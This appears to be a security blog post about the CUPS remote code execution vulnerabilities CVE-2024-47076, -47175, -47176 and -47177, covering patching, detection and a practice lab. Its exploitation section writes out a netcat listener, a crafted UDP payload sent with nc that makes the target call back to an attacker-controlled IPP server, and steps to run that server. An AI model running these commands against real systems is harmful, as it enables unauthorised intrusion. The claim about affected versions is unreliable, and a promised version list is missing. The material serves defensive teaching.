CUPS, an open-source printing system, is vulnerable to multiple unauthenticated remote code execution vulnerabilities tracked as CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.
As you read you will also learn:
This report focuses on the critical vulnerabilities in CUPS (Common Unix Printing System) identified as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177. These vulnerabilities allow for remote code execution (RCE) and the injection of malicious code through the manipulation of Internet Printing Protocol (IPP) data. These flaws are found in key components of the CUPS system, affecting Unix-like operating systems such as Linux and macOS. Immediate patching and security mitigation strategies are essential to prevent exploitation.
The Common Unix Printing System (CUPS) is an essential printing framework widely utilized in Unix-like operating systems, including various distributions of Linux and macOS. By implementing the Internet Printing Protocol (IPP), CUPS facilitates seamless printing services over local and networked environments, allowing users to manage and deploy printers efficiently.
In October 2024, security researchers revealed four critical vulnerabilities—CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177—that significantly threaten the integrity of systems running CUPS. These vulnerabilities primarily target key libraries and services such as libcupsfilters, libppd, and the cups-browsed service. The risks associated with these flaws are intensified by the fact that they allow attackers to remotely execute arbitrary code without requiring authentication, thus posing a severe threat to the confidentiality, integrity, and availability of the affected systems
The impact of these vulnerabilities is significant, as many organizations rely on CUPS for their printing infrastructure. Reports indicate that thousands of CUPS installations are publicly accessible, increasing the risk of exploitation.
By understanding the nature of these vulnerabilities and proactively addressing them, organizations can enhance their security posture and protect their systems from potential malicious attacks. This blog article aims to provide valuable insights into these vulnerabilities, enabling organizations to take the necessary steps to safeguard their infrastructure.
The vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 are categorized as critical, with CVSS scores indicating their potential impact on affected systems. Specifically:
Versions Affected:
The vulnerabilities impact several versions of CUPS, particularly those released before the patches were applied. Notably, CUPS versions prior to 2.0.1 are vulnerable to these exploits. Users and administrators are strongly advised to check their installations against the following affected versions:
Most Linux distributions, including Ubuntu, Debian, Fedora, and others that use CUPS, are affected.
The exploitation of CUPS vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 has been documented in the wild, with researchers and security analysts reporting limited but significant cases of active exploitation. These vulnerabilities allow attackers to remotely exploit the CUPS print service infrastructure, often leading to full system compromise due to the privileged nature of the CUPS daemon.
To protect against the CUPS vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177):
Apply Security Patches: Update CUPS and related libraries to their latest versions using your system’s package manager.
sudo apt update && sudo apt upgrade
sudo systemctl restart cups.service
Regularly check for updates as new security fixes are released.
Disable the cups-browsed Service:
sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
This ensures the service is not running and cannot be exploited.
Block Access to UDP Port 631
sudo ufw deny proto udp from any to any port 631
Firewall rules can be used to prevent access to the vulnerable services.
These actions will reduce exposure to the vulnerabilities while patches are being rolled out.
The core of the vulnerability involves exploiting CUPS by tricking it into generating a malicious PostScript Printer Description (PPD) file. This file contains attacker-controlled commands. When a print job is sent to the compromised printer, the command is executed with the privileges of the "lp" user (which is the user under which CUPS runs). While this user typically does not have elevated privileges, this method can be an entry point for further attacks.
There are two primary methods to generate the malicious PPD file:
Local Network via mDNS: An attacker can use multicast DNS (mDNS) to automatically register a new printer or replace the PPD file of an existing printer. This requires the attacker to generate multicast datagrams and deliver them to the cups-browsed daemon on port 631. While multicast traffic doesn’t travel across the Internet, local network attacks are still significant, especially in unprotected environments.
Any Network via Legacy UDP Protocol: The attacker can also exploit a legacy UDP-based protocol to register a new printer with a malicious PPD file from any network, including over the Internet. This involves sending a crafted UDP datagram to port 631, which is processed by the cups-browsed service. Proper firewall configurations or a NAT router can mitigate this attack by blocking access to port 631.
Exploiting the vulnerabilities tracked as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 involves tricking the CUPS system into processing malicious IPP (Internet Printing Protocol) attributes that lead to arbitrary code execution. Here's a closer look at how these vulnerabilities can be exploited:
To determine if a target CUPS instance is vulnerable, an attacker can set up a Netcat listener on their own machine. This can be done with the following command:
netcat -nvlp 4444
This command opens a listener on port 4444, waiting for any incoming connections.
Once the listener is set up, the attacker can send a specially crafted payload to the target CUPS instance's UDP service, typically operating on port 631. This is achieved using the following command:
echo '0 3 http://<attacker-ip>:<port>/printers/LetsDefend | nc -nu <target-ip> 631
In this command, replace <attacker-ip> with the attacker's IP address and <target-ip> with the target's IP address. The command sends a UDP packet that attempts to exploit the vulnerabilities in the CUPS service.
If the target is vulnerable, executing the initial command will trigger a callback to the attacker's listener, allowing them to capture any data sent back from the target system. This response can potentially contain sensitive information or confirmation of successful exploitation.
To exploit the CUPS vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177), you will need to set up an IPP (Internet Printing Protocol) server. You can use the ipp-server project available on GitHub. Follow these steps to get it running:
Clone the Repository: Open your terminal and run:
git clone https://github.com/h2g2bob/ipp-server.git
Run the Server: After compiling, start the IPP server using the default configuration, which is usually adequate for testing:
python -m ippserver --port 1234 save /tmp/
Once the IPP server is running, the exploitation involves running a custom Python script that leverages the malicious behavior of the server. This script is designed to interact with the CUPS service and exploit the vulnerabilities identified.
You can modify the python script as you wish.
By checking the localhost:631 on victim machine, you can see that the set up printer added to the “printers” section.
Once the user attempts to print using the malicious printer set up by the exploit, the malicious code embedded in the printer's attributes will execute on the target system. This happens because the printer attributes include commands defined in the exploit, which are processed by the target CUPS service when a print job is initiated.
Detecting exploitation of CUPS vulnerabilities such as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 involves a combination of log analysis, system behavior monitoring, and traffic inspection. Below are key strategies for detection:
The first line of defense is to inspect the CUPS log files (/var/log/cups/access_log, /var/log/cups/error_log) for any unusual activity, especially:
Set up network traffic monitoring tools to capture any suspicious UDP or mDNS traffic targeting port 631 (the port used by CUPS). Detecting unexpected or malicious datagrams, particularly from unfamiliar devices or networks, can help identify an attack.
Since exploitation may allow execution of commands as the lp user, review activity by this user. Check for any unusual commands or file changes initiated by the lp user, especially outside of normal printing processes.
By regularly analyzing logs and monitoring network traffic, you can effectively detect attempts to exploit CUPS vulnerabilities and take action before serious damage occurs.
On the LetsDefend platform, you can practice by analyzing the latest zero-days in a realistic SOC environment. You can investigate EventID:307 - SOC329 - CUPS RCE Detection via IPP Injection (CVE-2024-47177) and learn how attackers exploit vulnerabilities to gain unauthorized access and execute malicious code.
The vulnerabilities in CUPS—CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177—pose a critical security threat to Unix-based systems. Attackers can exploit these flaws to gain remote access, control print jobs, and inject malicious code into affected systems. With many servers publicly exposed via the IPP protocol, the attack surface is broad, requiring organizations to act swiftly by updating vulnerable CUPS versions and tightening network security.